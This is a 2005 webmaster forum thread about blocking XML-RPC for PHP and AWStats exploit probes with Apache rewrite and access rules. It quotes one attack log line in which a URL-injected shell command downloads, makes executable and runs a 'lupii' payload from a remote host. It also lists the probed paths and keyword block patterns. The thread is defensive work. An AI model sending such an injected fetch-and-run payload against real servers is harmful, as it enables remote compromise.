
How to nuke attackers via httpd.conf?

XML-RPC for PHP (+ lupii/listen) & AWStats exploits hitting hard

     
12:31 am on Dec 18, 2005 (gmt 0) -- Pfui (Senior Member, joined Nov 5, 2005)


1.) After weeks of relative calm, we're suddenly getting hammered again server-wide by what SANS terms:

XML-RPC for PHP Vulnerability Attack
[isc.sans.org...]

This thing makes the occasional FormMail exploit look like a flea on an elephant's rump. Here are the directories/files most frequently looked for in every all-in-one attack we're seeing:

/awstats/awstats.pl
/xmlrpc.php
/blog/xmlrpc.php
/blog/xmlsrv/xmlrpc.php
/blogs/xmlsrv/xmlrpc.php
/drupal/xmlrpc.php
/phpgroupware/xmlrpc.php
/wordpress/xmlrpc.php
/xmlrpc.php
/xmlrpc/xmlrpc.php
/xmlsrv/xmlrpc.php

And these, too, but less frequently --

/cgi-bin/includer.cgi
/scgi-bin/includer.cgi
/includer.cgi
/cgi-bin/include/includer.cgi
/scgi-bin/include/includer.cgi
/cgi-bin/inc/includer.cgi
/scgi-bin/inc/includer.cgi
/cgi-local/includer.cgi
/scgi-local/includer.cgi
/cgi/includer.cgi
/scgi/includer.cgi
/hints.pl
/cgi/hints.pl
/scgi/hints.pl
/cgi-bin/hints.pl
/scgi-bin/hints.pl
/hints/hints.pl
/cgi-bin/hints/hints.pl
/scgi-bin/hints/hints.pl
/webhints/hints.pl
/cgi-bin/webhints/hints.pl
/scgi-bin/webhints/hints.pl
/hints.cgi
/cgi/hints.cgi
/scgi/hints.cgi
/cgi-bin/hints.cgi
/scgi-bin/hints.cgi
/hints/hints.cgi
/cgi-bin/hints/hints.cgi
/scgi-bin/hints/hints.cgi
/webhints/hints.cgi
/cgi-bin/webhints/hints.cgi
/scgi-bin/webhints/hints.cgi

2.) We don't run PHP or AWStats or any of the above scripts, so every single hit rewrites to a custom error page. And because of all the code spewed by each attack -- up to a WHOPPING 9300 characters+spaces and 99 lines in mere seconds for each IP! -- the scores and scores of complex hits are blowing up every site's access, error and rewrite logs. Here's just one of 33 similar lines from a single attack, broken at the IP addresses to prevent side-scroll:

"GET /cgi-bin/includer.cgi?¦cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`
IP.address.here/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`
IP.address.here¦ HTTP/1.1" 302 237 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

3.) I'm a Web geek, not a SysAdmin, so I know I can rewrite the 'bad' file requests to 403/Forbidden. However, I'd prefer to lock them out *before* they reach every single site. Thus my Q --

Is it possible to block attacks/file requests via httpd.conf (Apache 1.3.X)?

If yes, could someone please tell me precisely where/how so I can pass along the info? (The firewall kills nimda/Code Red, but this exploit is new and also involves many more file requests. Anyway...)

4.) Not being root, I won't have the luxury of testing tweaks until I find one that works. So what follows are a few ideas. Your thoughts, please?

a.) Because there's more than one directory involved in the attacks, the following (akin to httpd.conf's <Location /cgi-bin/phf*> section, etc.) won't snag everything --

<Location /cgi-bin/php*>
Deny from all
ErrorDocument 403 [127.0.0.1...]
</Location>

But how about adding all of these variations to stop almost all of the attacks?

<Location /php*>
Deny from all
ErrorDocument 403 [127.0.0.1...]
</Location>

<Location /awstats\.pl*>
Deny from all
ErrorDocument 403 [127.0.0.1...]
</Location>

<Location /hints\.pl*>
Deny from all
ErrorDocument 403 [127.0.0.1...]
</Location>

<Location /hints\.cgi*>
Deny from all
ErrorDocument 403 [127.0.0.1...]
</Location>

<Location /includer\.cgi*>
Deny from all
ErrorDocument 403 [127.0.0.1...]
</Location>

b.) Alternatively, might atypical Web words unique to the file requests/commands -- lupii, listen, awstats.pl (also: awstats.pl?configdir=), chmod, echo -- be a way to stop these at the httpd.conf level... somehow?

c.) Finally (no, really), do you think simply adding the following to httpd.conf might do the trick server-wide? (Akin to httpd.conf's <Files ~ "^\.ht"> section, etc.) --

<Files ~ "^\.php">
Order deny,allow
Deny from all
</Files>

<Files ~ "^\awstats\.pl">
Order deny,allow
Deny from all
</Files>

<Files ~ "^\hints\.cgi">
Order deny,allow
Deny from all
</Files>

<Files ~ "^\hints\.pl">
Order deny,allow
Deny from all
</Files>

<Files ~ "^\includer\.cgi">
Order deny,allow
Deny from all
</Files>

Thanks in advance for your assistance (& for slogging through this post, too)!

1:10 am on Dec 18, 2005 (gmt 0) -- jdmorgan (Senior Member, Top Contributor of All Time, joined Mar 31, 2002)


Pfui,

The only recourse you have is to either block them using a 'smart' firewall, or to return a 403-Forbidden.

That can be accomplished using mod_access "Deny from env=<variable>" with mod_setenvif testing the Request_URI, or by using mod_rewrite:


RewriteRule (awstats\.pl|xmlrpc\.php|includer\.cgi|hints\.pl)$ - [F]
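
For reference, the mod_setenvif/mod_access variant might look roughly like this (a sketch only; the "block_this" variable name and the <Location /> scope are illustrative):

# Sketch: tag matching requests, then deny anything carrying the tag
SetEnvIf Request_URI "(awstats\.pl|xmlrpc\.php|includer\.cgi|hints\.pl)$" block_this
<Location />
Order allow,deny
Allow from all
Deny from env=block_this
</Location>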

Of course, the problem is that you'll still be wasting bandwidth sending your custom 403 error page to these idiots.

A work-around (stay with me here) is to do the following:

Create a new subdirectory below web root.
Place a custom 403 error page in that subdirectory. Let's call it "403.html" for now. Leave out all the HEAD content, and just put a few characters in this file, so you can recognize it by filesize when fetched -- I use just the text "No."
Now create an .htaccess file in that subdirectory that contains the following:


ErrorDocument 403 /path_to_this_subdirectory/403.html
Options +FollowSymLinks
RewriteEngine on
RewriteRule !^403\.html$ - [F]

Now, instead of the first code snippet I posted above, use the following in httpd.conf or in your web root .htaccess file:

RewriteRule (awstats\.pl|xmlrpc\.php|includer\.cgi|hints\.pl)$ /path_to_subdirectory/$1 [L]

Now when a bad-bot attempts to fetch one of those files, it gets rewritten to the subdirectory. But no files in that subdirectory are allowed to be fetched except for 403.html. So, the 403 error handler is invoked, and returns only a 403-Forbidden server response header and the three-byte response from 403.html, thus minimizing your bandwidth loss.

There are several ways to implement this idea using mod_access, SetEnvIf, etc. I just show mod_rewrite because all the needed functions are available in that single module. If you decide to stick with "Location", then consider using LocationMatch instead. That way, you can use regular expressions and combine the filepath patterns into a single section, much as is commonly done for user-agent patterns.
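
Something along these lines, for example (again just a sketch; adjust the pattern to cover whatever you're actually seeing):

# Sketch: one regex container instead of many separate <Location> blocks
<LocationMatch "(awstats\.pl|xmlrpc\.php|includer\.cgi|hints\.(pl|cgi))">
Order deny,allow
Deny from all
</LocationMatch>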

Set your RewriteLogLevel to 0 -- or to 1 if absolutely required -- unless you are actually debugging something.

You can also dig into mod_log_config and configure your logging to discard these requests from your log data after you're sure the code is working.
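
For instance, something like this (a sketch -- the "dontlog" variable, the log path, and the "combined" format name are placeholders for whatever your config actually uses):

# Sketch: tag the junk requests, then log only requests that are not tagged
SetEnvIf Request_URI "(awstats\.pl|xmlrpc\.php|includer\.cgi|hints\.pl)$" dontlog
CustomLog /path/to/access_log combined env=!dontlog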

So bottom line is either block them at the firewall, or at least minimize their impact on your server, logs, and bandwidth utilization.


Jim

8:24 pm on Dec 20, 2005 (gmt 0) -- Pfui (Senior Member, joined Nov 5, 2005)


Jim, thank you for your extended reply -- the bulk of which I'm still parsing :) I'm now testing this everything-but-the-kitchen-sink Rule:

RewriteRule (awstats|awstats\.pl|default\.ida|echo|FormMail\.cgi|hints\.cgi|hints\.pl|includer\.cgi|listen|lupii|stream|xmlrpc\.php|xmlsrv)$ - [NC,F]


Thanks again!

P.S. Search ref: A related thread [webmasterworld.com].

 
